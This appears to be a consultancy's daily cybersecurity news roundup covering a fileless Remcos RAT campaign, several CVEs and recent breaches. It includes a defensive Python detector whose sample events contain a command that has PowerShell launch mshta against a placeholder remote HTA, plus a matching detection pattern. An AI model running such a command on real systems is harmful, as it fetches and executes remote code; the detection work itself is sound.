
Cybersecurity Alerts: Major Breaches Uncovered Today


Good day and welcome to our daily cybersecurity roundup. Today’s bulletin covers an array of notable vulnerabilities, fileless attack campaigns and disruptive breaches across the digital landscape. Let’s dive straight into the details, keeping our tone both technical and friendly – much like a heated chat over a cuppa with an old acquaintance.

Fileless Remcos RAT via LNK Files and PowerShell

Security researchers have spotted Remcos RAT being deployed through a crafty fileless attack. The malicious campaign uses LNK shortcut files to trigger MSHTA.exe within PowerShell, skilfully evading traditional disk-based defences. This serves as a pressing reminder to maintain layered security measures, especially in detecting and neutralising memory-resident threats.
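Because the chain described above never writes a payload to disk, process-creation telemetry is where it shows up. The following detection logic is an added example, not code from the bulletin or from any vendor: it runs three heuristics over constructed Sysmon Event ID 1 records (the events, paths and the example.invalid URL are made up for illustration).

```python
"""Heuristics for the LNK -> PowerShell -> MSHTA fileless chain (added example)."""
import json
import re
from pathlib import PureWindowsPath

# Constructed Sysmon Event ID 1 (process creation) records as JSON lines.
# Events 1-2 model the chain; events 3-4 are benign controls.
SAMPLE_EVENTS = r"""
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -c mshta.exe http://example.invalid/stage.hta"}
{"Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "mshta.exe http://example.invalid/stage.hta"}
{"Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe C:\\Users\\alice\\notes.txt"}
{"Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "mshta.exe C:\\Program Files\\Vendor\\help.hta"}
"""

SHELLS = {"powershell.exe", "pwsh.exe"}
# Assumption: mshta pointed at a URL or an inline script: URI has no business
# use in this environment; a local .hta opened from Explorer is left alone.
SUSPICIOUS_MSHTA_ARG = re.compile(r"(https?://|javascript:|vbscript:)", re.IGNORECASE)


def _name(path: str) -> str:
    """Lower-cased file name of a Windows image path ('' if missing)."""
    return PureWindowsPath(path).name.lower()


def analyse_event(event: dict) -> list:
    """Return the rule names a single process-creation event trips."""
    image, parent = _name(event.get("Image", "")), _name(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if image == "mshta.exe" and parent in SHELLS:
        hits.append("mshta_spawned_by_powershell")      # the chain in the bulletin
    if image in SHELLS and "mshta" in cmd.lower():
        hits.append("powershell_invokes_mshta")         # same chain, seen one step earlier
    if image == "mshta.exe" and SUSPICIOUS_MSHTA_ARG.search(cmd):
        hits.append("mshta_remote_or_inline_script")    # nothing staged on disk
    return hits


def scan(jsonl: str) -> list:
    """Parse JSON lines and return (image name, [rules]) for every flagged event."""
    findings = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        hits = analyse_event(event)
        if hits:
            findings.append((_name(event["Image"]), hits))
    return findings


if __name__ == "__main__":
    for image, rules in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(rules)}")
```

Sysmon must be configured to log command lines and parent images for these fields to be present; the rules deliberately ignore a local .hta launched from Explorer, which is a tuning decision to revisit per environment.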

Google Chrome Update Patches Multiple Vulnerabilities

The latest Google Chrome update has rolled out fixes for critical flaws including CVE-2025-4372, CVE-2025-4664, and CVE-2025-2783, ensuring smooth and secure browsing. Regular updates like these highlight the necessity of keeping all your software up-to-date – an excellent habit for both personal users and companies with stringent compliance requirements.

Vulnerability Watch: Software, APIs and Network Devices

There’s been no shortage of action in the vulnerability space recently. Here’s a snapshot of some of the high-severity issues making headlines:

Lockfile Lint API (CVE-2025-4759)

Versions before 5.9.2 of the package are susceptible to an incorrect behaviour order vulnerability. Attackers can bypass early validations, potentially installing unintended npm packages. At a severity of 8.3, it’s a stark reminder for developers to always monitor dependency updates.

TOTOLINK A3002R/A3002RU Vulnerabilities

A series of critical buffer overflow vulnerabilities (CVE-2025-4733, CVE-2025-4732, CVE-2025-4731, and CVE-2025-4730) have been disclosed in TOTOLINK’s HTTP POST Request Handler. These vulnerabilities are triggered by manipulating parameters such as mac, ip6addr, service_type, and devicemac1, and they allow remote attacks that could compromise device integrity. With severities reaching up to 8.8, users of these devices should apply available patches or other mitigations as soon as possible.

Wibu CodeMeter Privilege Escalation (CVE-2025-47809)

This issue in Wibu CodeMeter before version 8.30a may allow local users to escalate privileges immediately after installation under specific conditions. With a severity of 8.2, organisations are advised to review and update their installations promptly.

Auth0-PHP Session Cookie Brute Force (CVE-2025-47275)

Auth0-PHP SDK versions from 8.0.0-BETA1 up to 8.14.0 are vulnerable to brute forcing of session cookies. Given its critical severity of 9.1, upgrading to version 8.14.0 and rotating cookie encryption keys are highly recommended to prevent unauthorised access.

Spotify/Github Spotipy Untrusted Code Execution (CVE-2025-47928)

This vulnerability affects the GitHub Actions workflow of Spotipy, the Python library for the Spotify Web API. It allows malicious actors to potentially execute untrusted code with extensive privileges. With the risk to critical secrets like GITHUB_TOKEN, prompt remediation is essential, especially for public repositories.

Emlog SQL Injection and Remote Code Execution (CVE-2025-47785)

An SQL injection flaw in Emlog’s admin interface may allow attackers to compromise administrator credentials and perform remote code execution. Although confirmation of a patch is still pending, administrators should take precautionary measures to secure their platforms.

Dell PowerScale InsightIQ Privilege Escalation (CVE-2025-30475)

For users of Dell PowerScale InsightIQ (versions 5.0 to 5.2), an improper privilege management flaw could allow an unauthenticated remote attacker to escalate privileges. Organisations managing data-intensive environments should review their configurations immediately.

Cyber Attacks, Breaches and Industry Alerts

In addition to the vulnerabilities mentioned above, here are some broader cybersecurity events impacting industries globally:

Pearson Customer Data Breach

London-based education giant Pearson has confirmed a breach that compromised a portion of customer data. This incident highlights how even well-resourced companies can fall victim to sophisticated intrusions.

Coinbase Under Siege

Coinbase has warned of potential damages ranging between $180 million and $400 million following a cyber attack that targeted a limited set of customer accounts. In a twist of irony, Coinbase has also launched a generous $20 million bounty to help identify the group behind the attack. Such proactive measures underscore the need for robust threat-hunting capabilities.

New European Vulnerability Database

The EU has launched a government-backed vulnerability database as an alternative to the MITRE CVE system. This new resource aims to streamline the reporting and tracking of vulnerabilities—it’s another step toward a more resilient cybersecurity ecosystem.

Other Noteworthy Incidents

Recent alerts also include an SQL injection vulnerability in WebERP (CVE-2025-46052) and an alarming report of “endemic” ransomware prompting the NHS to demand enhanced cybersecurity measures from its suppliers. Meanwhile, a pro-Ukraine hacking group claims responsibility for a cyberattack that wiped out a third of Russia’s national electronic court archive. These stories collectively serve as a reminder that cyber threats are as diverse as they are relentless.

In a climate where threats evolve daily, staying informed and proactive is key to robust cybersecurity. Here at Synergos Consultancy, we’re passionate about helping businesses navigate these challenges – whether you’re seeking ISO compliance or need tailored advice to manage associated risks. Remember, a secure environment isn’t built overnight, but every informed decision counts.

Stay safe and vigilant, and join us again tomorrow as we sift through the latest cybersecurity developments.


Adam Cooke